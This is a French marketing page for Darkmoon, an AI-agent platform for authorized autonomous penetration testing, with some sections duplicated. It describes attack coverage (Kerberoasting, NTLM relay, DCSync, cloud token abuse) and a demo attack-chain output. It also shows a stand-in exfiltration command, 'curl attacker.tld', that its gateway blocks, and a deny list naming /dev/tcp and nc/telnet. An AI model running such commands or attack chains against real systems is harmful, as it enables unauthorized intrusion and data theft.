Tests d'intrusion autonomes et continus

S.01Plateforme

50 agents IA spécialistes, 140+ outils de sécurité et un command center en direct.

Darkmoon mène toute la campagne offensive sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, puis qualifie chaque finding EXPLOITÉ, CONFIRMÉ ou NON CONFIRMÉ via une grille adversariale.

50Specialist AI agents
142Allow-listed tools
LiveSSE dashboard
AES-256Sealed runtime

140+ outils de sécurité, tous derrière une allow-list vérifiée au build

  • subfinder
  • httpx
  • naabu
  • katana
  • nuclei
  • ffuf
  • wpscan
  • sqlmap
  • hydra
  • hashcat
  • netexec
  • bloodhound
  • impacket
  • mimikatz
  • kubectl
  • kubescape
  • whatweb
  • wafw00f
  • arjun
  • playwright
Infrastructure MapEnter VR

Campaign · camp_20260426_3d2f… · 26 Apr 2026, Refresh

DatabaseAdmin ConfigSession KeyFiles (/ftp)Web ApplicationMetricsAPI DocsFrontendNoSQL StoreServer (Internet)Web ServerDATA & SECRETS
  1. Step 1 / 4, Reachable from the internet
  2. Step 2 / 4, Web application · authentication is too weak
  3. Step 3 / 4, Database · password hashes exposed
  4. Step 4 / 4, Files (/ftp) · sensitive data exposed
16Nodes
15Connections
57Vulnerabilities
8critical
24high
21medium
4low

Severity critical high medium low info, PR remediation

Infrastructure, Live Campaign, Vulnerabilities, Dashboard, Scheduler, History

Your projectsDarkmoon Assessm…, Darkmoon Demo, Admin

Internet-facingServer (Internet), Web Server, Web Server (HTTPS), Reverse Proxy, Target, WebSocket

Web Application 37, Metrics 2, API Docs, Frontend, Realtime, NoSQL Store

Data & secretsDatabase 8, Admin Config 3, Session Key 3, Files (/ftp) 4

S.02Agents IA

50 spécialistes. Un orchestrateur. Zéro pivot manuel.

L'orchestrateur identifie la stack de votre cible et dépêche automatiquement les bons spécialistes, du web et du cloud à l'Active Directory, Kubernetes, la CI/CD et le firmware. Un agent llm dédié couvre l'OWASP LLM Top 10, et en Pro un agent de remédiation transforme les findings confirmés en pull requests de correctif validées en sandbox, à relire par votre équipe.

Web & API

Exploitation full-stack

SQLi, XSS, SSRF, IDOR, RCE, SSTI, désérialisation, abus JWT, upload de fichier et path traversal, validés avec de vrais payloads, jamais des signatures.

Lancer un pentest web & API full-stack

Active Directory · AWS · Azure · GCP

Compromission identité & cloud

AS-REP roasting, Kerberoasting, relais NTLM, DCSync et ADCS ESC1-ESC8, plus minting de token IMDS, extraction Key Vault et pivots ROPC, chacun prouvé avec l'appel exact.

Compromettre l'Active Directory et le cloud

Embarqué · Kubernetes · LLM/MCP

Firmware & endpoints IA

Extraction binwalk/squashfs, récupération de backdoor et exploitation de routeurs, RBAC Kubernetes et évasion de nœud, et un agent llm dédié à l'OWASP LLM Top 10.

Scanner firmware, Kubernetes et la couche LLM

S.03Périmètres

Agent [#01] · Web

Dépêchés par l'orchestrateur

  • pentest · orchestrator
  • llm · mcp
  • wordpress · cms
  • graphql · api
  • headless browser
  • aws · azure · gcp
  • active directory
  • entra id · sso
  • kubernetes
  • docker · registry
  • github · gitlab · jenkins
  • terraform · ansible
  • sql · nosql · vault
  • iot firmware
  • mobile
  • firewall · vpn
  • node · php · spring
  • observability
S.04Pourquoi Darkmoon

Pas un scanner. Un chef d'orchestre autonome de la sécurité.

Darkmoon raisonne sur votre cible, modélise la surface d'attaque et dépêche les bons agents sur le web, le cloud, l'identité, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, avec un contrôle complet en cascade.

Cœur moteur
14 signaux
Dispatch multi-agents

L'orchestrateur identifie 14 signaux technologiques et route la campagne vers les bons spécialistes sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, en séquentiel ou en parallèle, avec une cascade plafonnée à trois niveaux pour éviter toute récursion infinie.

En savoir plus
S.05SAST + remédiation autonome · Pro

Ne prouvez pas seulement la faille. Livrez le correctif relu.

L'agent de remédiation Pro de Darkmoon prend le relais là où le pentest s'arrête. Pour chaque finding confirmé, il audite le code source de la cible à la recherche de la cause racine, écrit le correctif minimal, le prouve dans un sandbox éphémère et ouvre une pull request que votre équipe relit. Il ne merge jamais de lui-même.

01 · Audit du code (SAST)

Trouver la cause racine

Un audit de sécurité en trois phases relie chaque finding prouvé du sink vulnérable jusqu'à sa cause racine dans le code de la cible. Uniquement des problèmes de sécurité, aucun bruit de style.

02 · Validation en sandbox

Prouver que le correctif tient

L'exploit est reproduit sur un build neuf, le correctif appliqué, puis l'exploit et ses variantes rejoués pour prouver qu'ils échouent désormais, tandis que le comportement normal de l'application et ses tests passent toujours.

03 · Ouverture d'une pull request

Un patch, avec preuve avant/après

Un patch minimal ciblant la cause racine est poussé sur une branche et une pull request est ouverte, portant la preuve avant/après. GitHub, GitLab, Gitea, Bitbucket et Azure DevOps sont pris en charge.

04 · Relecture et merge humains

Toujours une proposition, jamais un merge

Chaque pull request est une proposition qu'une personne relit et merge. Darkmoon ne merge jamais automatiquement, et tout correctif qu'il n'a pas pu valider entièrement est ouvert en draft clairement identifié.

05

Dashboard ↔ pull request

Dans le dashboard, chaque finding gagne une colonne PR reliant la pull request qui le corrige : URL de la forge, état, findings liés, diff stat et la validation avant/après.

06

Credential reference

Les identifiants de push sont scellés au repos et résolus localement. L'exécution ne porte qu'une référence opaque, jamais le token, si bien que votre secret n'entre jamais dans le contexte du modèle.

Il rejoint un roster de 52 agents : un orchestrateur, 50 spécialistes offensifs (web, cloud, Active Directory, Kubernetes, bases de données et un agent llm qui déroule l'OWASP LLM Top 10 contre les endpoints d'inférence IA/LLM exposés) et cet agent de remédiation Pro.

S.06Voir en action

Deux minutes. Un pentest autonome, du début à la fin.

Périmètre défini, agents dépêchés, findings qualifiés, rapport livré. Pas une démonstration de fonctionnalités : le produit qui tourne sur une vraie cible.

Tarifs

Open source au cœur. Une licence pour exécuter la plateforme autonome complète.

Community
Gratuit à vie, GPLv3

Open source, auto-hébergé à vie

Star
Community
Gratuit

Gratuit à vie, GPLv3

Ce qui est inclus :

  • Moteur de pentest autonome complet (CLI/TUI), auto-hébergé, sur GitHub
  • GPLv3, audit, fork et modification libres des playbooks d'agents
  • 50 agents IA spécialistes + orchestrateur, 142 outils de sécurité
  • Exécution d'outils arbitrée par MCP, le modèle n'a jamais de shell
  • Privacy Gateway : tokenisation des prompts et coffre local
  • LLM local ou cloud, Ollama, llama.cpp, Anthropic, OpenAI, OpenRouter
  • Rapports Markdown et JSON ; GitHub Actions, GitLab, Jenkins, VS Code, JetBrains, Splunk, SDK/CLI
Pro
Tout Community, et

Pour les pentesters et équipes pro

Obtenir
Pro
€149par mois

Facturé €1788 par an

Tout Community, et :

  • Dashboard web : command center SSE en direct, historique des campagnes, planificateur
  • Carte orbitale 3D de la surface d'attaque, compatible VR (WebXR)
  • Agent de remédiation : pull requests de correctifs validés en sandbox, revue humaine
  • Rapports PDF brandés et web, modèles HackerOne / Bugcrowd
  • Runtime durci et scellé : stockage AES-256, licence liée au matériel, watchdog
  • API REST, utilisateurs du dashboard et SSO (OIDC), intégrations n8n et Grafana
  • Déploiement cloud en une commande (AWS, Azure, GCP, OVH) et mode appliance
Custom
Tout Pro, et

Pour entreprises, MSSP et revendeurs

Contact
Custom
Parlons-en

Sur mesure selon votre périmètre

Tout Pro, et :

  • Espace de travail partagé multi-postes
  • Rapports à votre marque
  • Programme partenaires / revendeurs (1 à 100 machines par clé)
  • Pentest à la demande, missions managées
  • Onboarding dédié et SLA
S.08Sécurité runtime

Conçu comme un coffre-fort. Fonctionne comme une arme.

Le garde-fou runtime de Darkmoon impose une exécution inviolable, un stockage scellé et un licensing matériel dès le démarrage du conteneur.

au reposResealing 30 s

Stockage scellé AES-256-GCM

Agents et workflows chiffrés au repos. Les clés dérivent de votre licence et de l'empreinte matérielle, resealées toutes les 30 secondes.

machine codeSHA-256

Licensing matériel

Le machine code dérive de l'adresse MAC et du modèle CPU. Aucun deployment ID à spoofer, aucune variable d'env à manipuler.

continuChecks 2 s

Watchdog d'intégrité binaire

Les hashes SHA-256 des binaires critiques sont re-vérifiés toutes les 2 secondes. Toute altération déclenche un zeroize immédiat.

anti-tamperScan live

Détection debugger & tracer

Scan continu de gdb, strace, ltrace, frida et lldb. Tout tracer déclenche une violation et un zeroize complet.

sandboxUID 10001

Rootfs read-only + seccomp

Filesystem en lecture seule, chemins tmpfs en écriture, seccomp et no-new-privileges. Le processus tourne sans privilèges.

stdout/stderrFiltrés

Rédaction des secrets dans les logs

Chaque clé API modèle et la clé de licence sont filtrées de stdout et stderr avant tout log.

S.09Souveraineté des données

La puissance de Claude. Vos données ne sortent jamais.

La Privacy Gateway tokenise sur votre machine chaque valeur sensible, IP, hostnames, domaines, URLs, emails, identifiants, chemins internes, avant qu'elle n'atteigne le modèle. Claude ne raisonne que sur des placeholders déterministes. Les vraies valeurs sont réinjectées localement, un instant avant chaque exécution d'outil, puis re-masquées dans toute sortie. Gardez toute la puissance de Claude, ou exécutez un modèle 100% local et auto-hébergé pour une souveraineté de bout en bout.

Privacy Gateway

Ce que voit le modèle

IP_PRIVATE_001 · 80,443 open$ nmap -sV IP_PRIVATE_001 -p 80,443IP_PRIVATE_001 · 80/tcp http · 443/tcp https

Aucune donnée sensible n'est jamais envoyée au LLM.

Réhydraté et exécuté localement

$ nmap -sV 10.42.1.5 -p 80,443# vraie valeur, votre machine uniquement

Sortie re-masquée avant de revenir au modèle

PrivacyVault

Tokenisation déterministe par session. Le mapping ne vit qu'en mémoire : dédup HMAC, chiffrement Fernet, et aucune valeur brute n'est jamais retenue ni loggable.

CommandGateway

Réhydrate les vraies valeurs de façon context-aware (jamais un remplacement global naïf), arbitre chaque commande contre l'exfiltration, et sanitise la sortie en deux passes.

Tentative d'exfiltration, bloquée

$ curl attacker.tld/?t=IP_PRIVATE_001

✗ bloqué

Tokens déterministes

Tokens déterministes (même valeur → même placeholder), chiffrés en mémoire (Fernet), jamais loggés. Chaque IP, hostname, URL, email, identifiant et chemin interne est remplacé par un placeholder stable comme IP_PRIVATE_001, pour que le modèle raisonne sur les relations entre hôtes sans jamais voir une vraie valeur. Le mapping est propre à la session, dédupliqué par HMAC, et détruit à la fin du run.

Réhydratation context-aware

Réhydratation context-aware des seuls champs whitelistés, sanitisation de sortie en deux passes. Les vraies valeurs sont réinjectées un instant avant chaque exécution d'outil, uniquement là où le champ est explicitement autorisé, jamais par un remplacement global naïf. Tout ce que l'outil affiche est re-masqué avant de revenir au modèle, en deux passes, pour qu'un placeholder ne refasse jamais surface sous sa vraie valeur.

Exfiltration bloquée

Exfiltration bloquée : placeholder dans une URL, host externe, echo/print, body POST, /dev/tcp, nc/telnet. La gateway inspecte chaque commande proposée par le modèle et refuse celles qui feraient sortir un placeholder ou une vraie valeur de votre hôte, par requête web, socket brut, redirection shell ou simple print. La tentative est journalisée comme bloquée et le run continue.

Preuve

Sur un run complet de bout en bout, gateway active en permanence, le modèle a raisonné sur la cible tout du long sans jamais voir son adresse réelle, zéro fois sur environ 3,5 Mo de trafic vu par le modèle. Le placeholder déterministe portait le raisonnement ; les vraies valeurs n'ont été restaurées que sur votre hôte, dans le rapport final. Un run mesuré, pas une garantie absolue.

Tokenisation réversible + gateway anti-exfiltration en open-source. Vault scellé, audit trail des réhydratations et preuve de conformité en Pro.

S.10Open source

Le modèle planifie. Il n'a jamais le shell.

L'architecture de Darkmoon est sa garantie de sécurité, et elle est entièrement auditable. L'IA raisonne et rédige le plan. Une passerelle MCP arbitre chaque appel d'outil. Lisez-le, puis exécutez-le vous-même.

# clone the open-source engine
$ git clone github.com/ASCIT31/Dark-Moon
$ cd Dark-Moon
# launch a campaign
$ ./darkmoon.sh "TARGET: acme.test"
✓ recon complete · 14 tech signals
✓ 6 agents dispatched · streaming live
S.11Mode de déploiement · Appliance

Darkmoon Appliance

Faites de votre infrastructure un nœud de sécurité autonome dédié. Software-defined. Auto-hébergé. Aucun matériel propriétaire.

Software-defined · Self-hosted · No proprietary hardware

S.12Darkmoon partout

Tourne là où votre équipe travaille déjà.

Le même moteur open source, branché à votre IDE, votre CI/CD, votre automatisation et votre stack SecOps. Chaque surface détecte son édition : le CLI communautaire lit votre rapport JSON local ; l'offre Pro payante ajoute l'API REST en direct, le streaming et la remédiation.

Pentest à la demandeManagé
€799/ engagement
  • Cadre légal & autorisations inclus
  • Mené de bout en bout par nos experts sécurité
  • Rapport débriefé dans un espace client sécurisé
S.14Service managé

Pas envie d'auto-héberger ? On lance le pentest pour vous.

Décrivez votre cible, signez le cadre en ligne, payez un forfait, nos experts mènent l'engagement offensif de bout en bout et livrent un rapport débriefé et étayé par des preuves dans votre espace client sécurisé.

S.15FAQ

Les questions que les équipes sécurité posent en premier.

En quoi Darkmoon diffère-t-il d'un scanner de vulnérabilités ?Plateforme

Darkmoon orchestre une campagne offensive de bout en bout, il raisonne sur la cible, dépêche des spécialistes par domaine, valide les findings avec de vrais payloads, construit un graphe d'infrastructure et produit un rapport structuré. Un scanner exécute des signatures en une passe. Darkmoon exécute un pentest.

Pourquoi l'IA n'a-t-elle jamais accès au shell ?Architecture

Par design. Le modèle planifie et raisonne, mais chaque invocation d'outil passe par une passerelle MCP qui valide et arbitre l'appel. Le modèle n'exécute jamais directement un shell, ce qui rend l'engagement auditable, borné et sûr. Toute l'architecture est open source.

Darkmoon est-il vraiment open source ?Open source

Oui. Le moteur est publié sur GitHub sous ASCIT31/Dark-Moon, licence GPLv3. Vous pouvez lire la logique d'orchestration, les playbooks d'agents et la couche MCP, et l'auto-héberger. La licence commerciale ajoute le runtime durci, le dashboard managé et le support.

Quels formats de rapport Darkmoon produit-il ?Reporting

Standard ISO 27001, HackerOne, Bugcrowd (VRT / P1–P5) et un format custom. Chaque rapport inclut scoring CVSS 3.1, mapping MITRE ATT&CK, contrôles ISO 27001, preuves brutes et guidance de remédiation. L'export PDF est brandé et protégé par mot de passe.

Comment fonctionne le licensing ?Licensing

Darkmoon utilise un licensing matériel. Votre clé de licence est liée à une empreinte machine dérivée de votre matériel (adresse MAC, modèle CPU), elle ne peut être ni clonée ni déplacée vers une autre machine en changeant une variable d'environnement.

Est-il sûr de l'exécuter contre des environnements de production ?Sécurité

Darkmoon inclut des niveaux de bruit configurables (stealth, low, moderate), un mode safe-harbor, l'application de l'out-of-scope et la propagation du scope par agent. Le runtime est durci avec un filesystem read-only, seccomp, no-new-privileges et watchdog continu.

S.16Next

Remplacez les pentests ponctuels par des tests de sécurité autonomes et continus.

Visibilité en direct, preuves validées et un rapport actionnable par votre équipe le jour même.

Darkmoon, Autonomous AI Penetration Testing Platform

Tests d'intrusion autonomes et continus

50 agents IA spécialistes, 140+ outils de sécurité et un command center en direct. Darkmoon mène toute la campagne offensive sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, puis qualifie chaque finding EXPLOITÉ, CONFIRMÉ ou NON CONFIRMÉ via une grille adversariale.

50
Specialist AI agents
142
Allow-listed tools
Live
SSE dashboard
AES-256
Sealed runtime

140+ outils de sécurité, tous derrière une allow-list vérifiée au build

S.04SAST + remédiation autonome · Pro
Ne prouvez pas seulement la faille. Livrez le correctif relu.

L'agent de remédiation Pro de Darkmoon prend le relais là où le pentest s'arrête. Pour chaque finding confirmé, il audite le code source de la cible à la recherche de la cause racine, écrit le correctif minimal, le prouve dans un sandbox éphémère et ouvre une pull request que votre équipe relit. Il ne merge jamais de lui-même.

01 · Audit du code (SAST)
FindingsCVSS
SQL injection9.8
SSRF to metadata9.1
Broken access control8.7
JWT signature bypass7.5
Path traversal6.9

Trouver la cause racine

Un audit de sécurité en trois phases relie chaque finding prouvé du sink vulnérable jusqu'à sa cause racine dans le code de la cible. Uniquement des problèmes de sécurité, aucun bruit de style.

02 · Validation en sandbox
$darkmoon run --scope identity
→AS-REP roast · 3 accounts
→Kerberoast · svc_sql cracked
→NTLM relay → DCSync
✓Domain Admin, proven

Prouver que le correctif tient

L'exploit est reproduit sur un build neuf, le correctif appliqué, puis l'exploit et ses variantes rejoués pour prouver qu'ils échouent désormais, tandis que le comportement normal de l'application et ses tests passent toujours.

03 · Ouverture d'une pull request
New engagement
Targetapp.acme.test
Scopeweb · API · cloud
Window5 business days
Flat rate€799

Un patch, avec preuve avant/après

Un patch minimal ciblant la cause racine est poussé sur une branche et une pull request est ouverte, portant la preuve avant/après. GitHub, GitLab, Gitea, Bitbucket et Azure DevOps sont pris en charge.

04 · Relecture et merge humains
Attack surfaceexposure

Toujours une proposition, jamais un merge

Chaque pull request est une proposition qu'une personne relit et merge. Darkmoon ne merge jamais automatiquement, et tout correctif qu'il n'a pas pu valider entièrement est ouvert en draft clairement identifié.

ClientsBilling · Stripe
Acme Corp3 licences
Nordic SOC12 licences
Blue Harbor1 licence
Margin this month−35 %

Dashboard ↔ pull request

Dans le dashboard, chaque finding gagne une colonne PR reliant la pull request qui le corrige : URL de la forge, état, findings liés, diff stat et la validation avant/après.

darkmoon-licence.dmeDocker
LicencePro · annual
Machine code7F3A-…-C21E
Seats1 node
Statussealed ✓

Credential reference

Les identifiants de push sont scellés au repos et résolus localement. L'exécution ne porte qu'une référence opaque, jamais le token, si bien que votre secret n'entre jamais dans le contexte du modèle.

Il rejoint un roster de 52 agents : un orchestrateur, 50 spécialistes offensifs (web, cloud, Active Directory, Kubernetes, bases de données et un agent llm qui déroule l'OWASP LLM Top 10 contre les endpoints d'inférence IA/LLM exposés) et cet agent de remédiation Pro.

Voir le benchmark de remédiation Pro : des correctifs prouvés en rejouant l'exploit · Comparer Darkmoon aux autres outils de pentest IA

S.05Voir en action
Deux minutes. Un pentest autonome, du début à la fin.

Périmètre défini, agents dépêchés, findings qualifiés, rapport livré. Pas une démonstration de fonctionnalités : le produit qui tourne sur une vraie cible.

S.06Pourquoi Darkmoon

Pas un scanner. Un chef d'orchestre autonome de la sécurité.

Darkmoon raisonne sur votre cible, modélise la surface d'attaque et dépêche les bons agents sur le web, le cloud, l'identité, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, avec un contrôle complet en cascade.

Cœur moteur
14 signaux
Dispatch multi-agents

L'orchestrateur identifie 14 signaux technologiques et route la campagne vers les bons spécialistes sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, en séquentiel ou en parallèle, avec une cascade plafonnée à trois niveaux pour éviter toute récursion infinie.

En savoir plus

Tarifs

Open source au cœur. Une licence pour exécuter la plateforme autonome complète.

Community
Gratuit à vie, GPLv3

Open source, auto-hébergé à vie

Star
Community
Gratuit

Gratuit à vie, GPLv3

Ce qui est inclus :

  • Moteur de pentest autonome complet (CLI/TUI), auto-hébergé, sur GitHub
  • GPLv3, audit, fork et modification libres des playbooks d'agents
  • 50 agents IA spécialistes + orchestrateur, 142 outils de sécurité
  • Exécution d'outils arbitrée par MCP, le modèle n'a jamais de shell
  • Privacy Gateway : tokenisation des prompts et coffre local
  • LLM local ou cloud, Ollama, llama.cpp, Anthropic, OpenAI, OpenRouter
  • Rapports Markdown et JSON ; GitHub Actions, GitLab, Jenkins, VS Code, JetBrains, Splunk, SDK/CLI
Pro
Tout Community, et

Pour les pentesters et équipes pro

Obtenir
Pro
€149par mois

Facturé €1788 par an

Tout Community, et :

  • Dashboard web : command center SSE en direct, historique des campagnes, planificateur
  • Carte orbitale 3D de la surface d'attaque, compatible VR (WebXR)
  • Agent de remédiation : pull requests de correctifs validés en sandbox, revue humaine
  • Rapports PDF brandés et web, modèles HackerOne / Bugcrowd
  • Runtime durci et scellé : stockage AES-256, licence liée au matériel, watchdog
  • API REST, utilisateurs du dashboard et SSO (OIDC), intégrations n8n et Grafana
  • Déploiement cloud en une commande (AWS, Azure, GCP, OVH) et mode appliance
Custom
Tout Pro, et

Pour entreprises, MSSP et revendeurs

Contact
Custom
Parlons-en

Sur mesure selon votre périmètre

Tout Pro, et :

  • Espace de travail partagé multi-postes
  • Rapports à votre marque
  • Programme partenaires / revendeurs (1 à 100 machines par clé)
  • Pentest à la demande, missions managées
  • Onboarding dédié et SLA

S.08Agents IA
50 spécialistes. Un orchestrateur. Zéro pivot manuel.

L'orchestrateur identifie la stack de votre cible et dépêche automatiquement les bons spécialistes, du web et du cloud à l'Active Directory, Kubernetes, la CI/CD et le firmware. Un agent llm dédié couvre l'OWASP LLM Top 10, et en Pro un agent de remédiation transforme les findings confirmés en pull requests de correctif validées en sandbox, à relire par votre équipe.

Web & API
FindingsCVSS
SQL injection9.8
SSRF to metadata9.1
Broken access control8.7
JWT signature bypass7.5
Path traversal6.9

Exploitation full-stack

SQLi, XSS, SSRF, IDOR, RCE, SSTI, désérialisation, abus JWT, upload de fichier et path traversal, validés avec de vrais payloads, jamais des signatures.

Active Directory · AWS · Azure · GCP
$darkmoon run --scope identity
→AS-REP roast · 3 accounts
→Kerberoast · svc_sql cracked
→NTLM relay → DCSync
✓Domain Admin, proven

Compromission identité & cloud

AS-REP roasting, Kerberoasting, relais NTLM, DCSync et ADCS ESC1-ESC8, plus minting de token IMDS, extraction Key Vault et pivots ROPC, chacun prouvé avec l'appel exact.

Embarqué · Kubernetes · LLM/MCP
Attack surfaceexposure

Firmware & endpoints IA

Extraction binwalk/squashfs, récupération de backdoor et exploitation de routeurs, RBAC Kubernetes et évasion de nœud, et un agent llm dédié à l'OWASP LLM Top 10.

S.09Sécurité runtime
Conçu comme un coffre-fort. Fonctionne comme une arme.

Le garde-fou runtime de Darkmoon impose une exécution inviolable, un stockage scellé et un licensing matériel dès le démarrage du conteneur.

Resealing 30 s
au repos
Stockage scellé AES-256-GCM

Agents et workflows chiffrés au repos. Les clés dérivent de votre licence et de l'empreinte matérielle, resealées toutes les 30 secondes.

SHA-256
machine code
Licensing matériel

Le machine code dérive de l'adresse MAC et du modèle CPU. Aucun deployment ID à spoofer, aucune variable d'env à manipuler.

Checks 2 s
continu
Watchdog d'intégrité binaire

Les hashes SHA-256 des binaires critiques sont re-vérifiés toutes les 2 secondes. Toute altération déclenche un zeroize immédiat.

Scan live
anti-tamper
Détection debugger & tracer

Scan continu de gdb, strace, ltrace, frida et lldb. Tout tracer déclenche une violation et un zeroize complet.

UID 10001
sandbox
Rootfs read-only + seccomp

Filesystem en lecture seule, chemins tmpfs en écriture, seccomp et no-new-privileges. Le processus tourne sans privilèges.

Filtrés
stdout/stderr
Rédaction des secrets dans les logs

Chaque clé API modèle et la clé de licence sont filtrées de stdout et stderr avant tout log.

S.10Souveraineté des données
La puissance de Claude. Vos données ne sortent jamais.

La Privacy Gateway tokenise sur votre machine chaque valeur sensible, IP, hostnames, domaines, URLs, emails, identifiants, chemins internes, avant qu'elle n'atteigne le modèle. Claude ne raisonne que sur des placeholders déterministes. Les vraies valeurs sont réinjectées localement, un instant avant chaque exécution d'outil, puis re-masquées dans toute sortie. Gardez toute la puissance de Claude, ou exécutez un modèle 100% local et auto-hébergé pour une souveraineté de bout en bout.

Privacy Gateway

Ce que voit le modèle
IP_PRIVATE_001 · 80,443 open
$ nmap -sV IP_PRIVATE_001 -p 80,443
IP_PRIVATE_001 · 80/tcp http · 443/tcp https

Aucune donnée sensible n'est jamais envoyée au LLM.

Réhydraté et exécuté localement
$ nmap -sV 10.42.1.5 -p 80,443
# vraie valeur, votre machine uniquement
Sortie re-masquée avant de revenir au modèle
Privacy
Gateway
PrivacyVaultTokenisation déterministe par session. Le mapping ne vit qu'en mémoire : dédup HMAC, chiffrement Fernet, et aucune valeur brute n'est jamais retenue ni loggable.
CommandGatewayRéhydrate les vraies valeurs de façon context-aware (jamais un remplacement global naïf), arbitre chaque commande contre l'exfiltration, et sanitise la sortie en deux passes.
Tentative d'exfiltration, bloquée$ curl attacker.tld/?t=IP_PRIVATE_001✗ bloqué
vraie valeur, votre machine uniquement
Tokens déterministes

Tokens déterministes (même valeur → même placeholder), chiffrés en mémoire (Fernet), jamais loggés. Chaque IP, hostname, URL, email, identifiant et chemin interne est remplacé par un placeholder stable comme IP_PRIVATE_001, pour que le modèle raisonne sur les relations entre hôtes sans jamais voir une vraie valeur. Le mapping est propre à la session, dédupliqué par HMAC, et détruit à la fin du run.

Réhydratation context-aware

Réhydratation context-aware des seuls champs whitelistés, sanitisation de sortie en deux passes. Les vraies valeurs sont réinjectées un instant avant chaque exécution d'outil, uniquement là où le champ est explicitement autorisé, jamais par un remplacement global naïf. Tout ce que l'outil affiche est re-masqué avant de revenir au modèle, en deux passes, pour qu'un placeholder ne refasse jamais surface sous sa vraie valeur.

Exfiltration bloquée

Exfiltration bloquée : placeholder dans une URL, host externe, echo/print, body POST, /dev/tcp, nc/telnet. La gateway inspecte chaque commande proposée par le modèle et refuse celles qui feraient sortir un placeholder ou une vraie valeur de votre hôte, par requête web, socket brut, redirection shell ou simple print. La tentative est journalisée comme bloquée et le run continue.

Preuve

Sur un run complet de bout en bout, gateway active en permanence, le modèle a raisonné sur la cible tout du long sans jamais voir son adresse réelle, zéro fois sur environ 3,5 Mo de trafic vu par le modèle. Le placeholder déterministe portait le raisonnement ; les vraies valeurs n'ont été restaurées que sur votre hôte, dans le rapport final. Un run mesuré, pas une garantie absolue.

Tokenisation réversible + gateway anti-exfiltration en open-source. Vault scellé, audit trail des réhydratations et preuve de conformité en Pro.

Conçu pour les environnements auto-hébergés et souverains

Open source
Le modèle planifie. Il n'a jamais le shell.

L'architecture de Darkmoon est sa garantie de sécurité, et elle est entièrement auditable. L'IA raisonne et rédige le plan. Une passerelle MCP arbitre chaque appel d'outil. Lisez-le, puis exécutez-le vous-même.

# clone the open-source engine
$ git clone github.com/ASCIT31/Dark-Moon
$ cd Dark-Moon
# launch a campaign
$ ./darkmoon.sh "TARGET: acme.test"
✓ recon complete · 14 tech signals
✓ 6 agents dispatched · streaming live

S.12Mode de déploiement · Appliance
Darkmoon Appliance

Faites de votre infrastructure un nœud de sécurité autonome dédié. Software-defined. Auto-hébergé. Aucun matériel propriétaire.

Software-definedSelf-hostedNo proprietary hardware

S.13Darkmoon partout
Tourne là où votre équipe travaille déjà.

Le même moteur open source, branché à votre IDE, votre CI/CD, votre automatisation et votre stack SecOps. Chaque surface détecte son édition : le CLI communautaire lit votre rapport JSON local ; l'offre Pro payante ajoute l'API REST en direct, le streaming et la remédiation.

GitHub Action · CI/CD · OSS + ProGitHub Action · OSS + Pro
GitLab CI/CD component · CI/CD · OSS + ProGitLab CI/CD component · OSS + Pro
Jenkins plugin · CI/CD · OSS + ProJenkins plugin · OSS + Pro
VS Code extension · IDE · OSS + ProVS Code extension · OSS + Pro
JetBrains plugin · IDE · OSS + ProJetBrains plugin · OSS + Pro
n8n community node · Automation · Pro seulementn8n community node · Pro seulement
Foundation SDK / CLI · SDK · OSS + ProFoundation SDK / CLI · OSS + Pro
Pentest à la demandeManagé
€799/ engagement
  • Cadre légal & autorisations inclus
  • Mené de bout en bout par nos experts sécurité
  • Rapport débriefé dans un espace client sécurisé
S.15Service managé

Pas envie d'auto-héberger ? On lance le pentest pour vous.

Décrivez votre cible, signez le cadre en ligne, payez un forfait, nos experts mènent l'engagement offensif de bout en bout et livrent un rapport débriefé et étayé par des preuves dans votre espace client sécurisé.

S.16FAQ
Les questions que les équipes sécurité posent en premier.

En quoi Darkmoon diffère-t-il d'un scanner de vulnérabilités ?Plateforme

Darkmoon orchestre une campagne offensive de bout en bout, il raisonne sur la cible, dépêche des spécialistes par domaine, valide les findings avec de vrais payloads, construit un graphe d'infrastructure et produit un rapport structuré. Un scanner exécute des signatures en une passe. Darkmoon exécute un pentest.

Pourquoi l'IA n'a-t-elle jamais accès au shell ?Architecture

Par design. Le modèle planifie et raisonne, mais chaque invocation d'outil passe par une passerelle MCP qui valide et arbitre l'appel. Le modèle n'exécute jamais directement un shell, ce qui rend l'engagement auditable, borné et sûr. Toute l'architecture est open source.

Darkmoon est-il vraiment open source ?Open source

Oui. Le moteur est publié sur GitHub sous ASCIT31/Dark-Moon, licence GPLv3. Vous pouvez lire la logique d'orchestration, les playbooks d'agents et la couche MCP, et l'auto-héberger. La licence commerciale ajoute le runtime durci, le dashboard managé et le support.

Quels formats de rapport Darkmoon produit-il ?Reporting

Standard ISO 27001, HackerOne, Bugcrowd (VRT / P1–P5) et un format custom. Chaque rapport inclut scoring CVSS 3.1, mapping MITRE ATT&CK, contrôles ISO 27001, preuves brutes et guidance de remédiation. L'export PDF est brandé et protégé par mot de passe.

Comment fonctionne le licensing ?Licensing

Darkmoon utilise un licensing matériel. Votre clé de licence est liée à une empreinte machine dérivée de votre matériel (adresse MAC, modèle CPU), elle ne peut être ni clonée ni déplacée vers une autre machine en changeant une variable d'environnement.

Est-il sûr de l'exécuter contre des environnements de production ?Sécurité

Darkmoon inclut des niveaux de bruit configurables (stealth, low, moderate), un mode safe-harbor, l'application de l'out-of-scope et la propagation du scope par agent. Le runtime est durci avec un filesystem read-only, seccomp, no-new-privileges et watchdog continu.

S.17Next
Remplacez les pentests ponctuels par des tests de sécurité autonomes et continus.

Visibilité en direct, preuves validées et un rapport actionnable par votre équipe le jour même.